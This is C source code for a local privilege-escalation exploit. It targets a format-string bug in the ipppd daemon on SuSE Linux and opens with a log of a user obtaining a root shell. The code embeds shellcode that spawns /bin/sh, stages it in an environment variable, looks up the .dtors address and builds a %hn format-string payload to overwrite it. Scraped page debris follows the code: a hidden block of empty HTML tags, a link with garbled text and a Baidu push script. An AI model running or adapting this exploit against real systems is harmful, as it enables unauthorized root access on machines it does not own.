/*
*This is a lame exploit(i have only rewrite the fmtbuilder.c , with some features) for the formatstring bug in ipppd,*
*i have test this exploit under SuSE 7.3, but i'm sure it works under SuSE 8.0 too.
*
*This exploit detects automaticly the .dtors addr. and shelladdr.
*you only have to start the eggshell
*	./exploitipppd -s
*then
*	-/exploitipppd -e
*----------------------------------------------------------------------------------------------------------------------
study@delikon:~/security/fmt> id
uid=502(study) gid=100(users) Gruppen=100(users),14(uucp),16(dialout),17(audio),33(video)

study@delikon:~/security/fmt> ./exploitipppd -s

Use ./exploitipppd  -e to explore ipppd now

sh-2.05$ ./exploitipppd -e

You used .dtors=806c1c4 , Shellcodeaddr.=bffffb35 , offset=11 ,base=5


Please type id, and check if you are r00t ;=)


If you are not, type ./exploitipppd -h and try different offsets and check file pathes in the header

sh-2.05# id
uid=0(root) gid=100(users) groups=100(users),14(uucp),16(dialout),17(audio),33(video)
sh-2.05#
------------------------------------------------------------------------------------------------------------------------
tail -f /vat/log/messages
give this output

Nov  7 15:20:56 delikon ipppd: Exit.
------------------------------------------------------------------------------------------------------------------------
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>



#define ADD     0x100
#define OCT( b0, b1, b2, b3, addr )  { \
             b0 = (addr >> 24) & 0xff; \
             b1 = (addr >> 16) & 0xff; \
             b2 = (addr >>  8) & 0xff; \
             b3 = (addr      ) & 0xff; \
}
#define DTORS "/usr/bin/objdump -s -j .dtors /usr/sbin/ipppd | /usr/bin/cut   -c 2-9 |/usr/bin/awk  NR==5"
#define IPPPD "/usr/sbin/ipppd"
#define OFFSET 11
#define BASE 5
#define DEF_EGGSIZE     500
#define DEF_ALIGN       4




char vitamin[300];

char DtorsAddr[36];
unsigned long get_sp(void)
{       __asm__ ("movl %esp, %eax");
}
char nop[] = { 0x90 };



static char shellcode[] = //ptrace24.c shellcode
        "\x6a\x17\x58\x31\xdb\xcd\x80\x31"
	"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
	"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
	"\x89\xe1\x8d\x42\x0b\xcd\x80";



int i=0;
char *pointer;
char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
int find(){
/*Thanks to GOBBLES for the find() code*/

                pointer = (char *)get_sp();
                while((i = strncmp(pointer, nops, strlen(nops))) != 0)
                        pointer++;

                if(i == 0) {
                         pointer=pointer+1;

			return pointer;
                }
                else {
                        fprintf(stderr, "Sorry nimm GDB\n");
                        return;
                }
}

char *
grepit()
{
//from the Mixter md5bd.c backdoor
    FILE *p;
    char fmt[1024];
    snprintf(fmt, 1024, DTORS);
    p = popen(fmt, "r");
    memset(DtorsAddr, 0, 36);
    fread(DtorsAddr, 32, 1, p);
    fclose(p);
    return DtorsAddr;
}

char *
build_hn( unsigned int retaddr, unsigned int offset, unsigned int base )
{
// From the fmtbuilder.c
  unsigned int length;
  unsigned int high, low;
  char * buf;
  int start = ((base / (ADD*ADD)) + 1)*ADD*ADD;

  high = ( retaddr & 0xffff0000 ) >> 16;
  low = retaddr & 0x0000ffff;


  length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15;
  if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
    fprintf( stderr, "Can't allocate buffer (%d)\n", length );
    exit( -1 );
  }
  memset( buf, 0, length );

  snprintf( buf, length,
            "%%.%hdx%%%d$n%%.%hdx%%%d$hn",
            low - ( sizeof( size_t ) * 2 ) + start - base,
            offset,
            high - low + start,
            offset+1 );
  return buf;
}

void soso(void)
{
printf ( "\t\t***yet another lame ipppd local root formatstring exploit***\n\n");
printf ( "**usage:\n\n exploitipppd -s start the eggshell -e !ExploRe iT! [-d .dtors section -o offset -b base]\n\n");
}


void egg()
{

	char *eggbuf, *buf_ptr;
        int align, i, eggsize ;

        align = DEF_ALIGN;
        eggsize = DEF_EGGSIZE ;



        if ( (eggbuf = malloc( eggsize )) == NULL ) {
                printf ("error : malloc \n");
                exit (-1);
        }


        /* set egg buf */
        memset( eggbuf, (int)NULL , eggsize );


        for ( i = 0; i <  250 ; i++ )
                strcat ( eggbuf, nop );

        strcat ( eggbuf, shellcode );

        for ( i =0 ; i < align ; i++ )
                strcat ( eggbuf, "A");

        memcpy ( eggbuf, "S=", 2 );
        putenv ( eggbuf );
	fprintf(stderr, "\nUse ./exploitipppd  -e to explore ipppd now\n\n");

        system("/bin/sh");

}


int
main( int argc, char **argv[] )
{

  char opt;
  char * fmt;
  char * endian;
  unsigned long locaddr, retaddr;
  unsigned int offset, base, align = 0;
  unsigned char b0, b1, b2, b3;
  int length, ch;
  int t=0, u=0;

if(argc < 2)
{
soso();
exit(1);

}

  length = ( sizeof( size_t ) * 16 ) + 1;
  if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
    fprintf( stderr, "Can't allocate buffer (%d)\n", length );
    exit( -1 );
  }
  memset( endian, 0, length );

 offset = OFFSET;
 base = BASE;//the distance from the beginning of the string to the exploration string, here you have a /dev/ at the begining
  grepit();
 locaddr = strtoul(  DtorsAddr, NULL, 16);
 locaddr +=4;



while((opt = getopt(argc, argv, "sed:o:b:h")) != EOF) {
                switch(opt) {
			case 's':
				egg();
    				fprintf(stderr, "\nUse %s -e to explore ipppd now\n\n",argv[0]);
				exit(0);
			case 'e':
				break;
			case 'd':
                                locaddr = strtoul(  optarg, NULL, 16);
				locaddr += 4;
                                break;
                        case 'o':
                                offset = atoi(optarg);
                                break;
                        case 'b':
                                base = atoi(optarg);
                                break;
                        case 'h':
                                soso();
				exit(0);
				break;
				}}

u = find();


 retaddr =  u;



  OCT( b0, b1, b2, b3, locaddr );

  if ( base%4 ) {
    align = 4 - ( base%4 );
    base += align;
  }



memset(vitamin, '\0', sizeof(vitamin));
    snprintf( endian, length,
              "%c%c%c%c"
              "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 2, b2, b1, b0 );
    fmt = build_hn( retaddr, offset, base );





  for( ; align>0; --align)
  {
  strcat(vitamin,"X");
  }
  strcat(vitamin,endian);
  strcat(vitamin, fmt );
  for( t=0;t<=260;t++)
  strcat(vitamin,"x");

  fprintf(stderr, "\nYou used .dtors=%x , Shellcodeaddr.=%x , offset=%d ,base=%d \n\n", (locaddr-4), retaddr, offset,base-3);
  fprintf(stderr, "\nPlease type id, and check if you are r00t ;=)\n\n");
  fprintf(stderr, "\nIf you are not, type %s -h and try different offsets and check file pathes in the header \n\n",argv[0]);





execl(IPPPD, "ipppd", vitamin, NULL);


}

<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>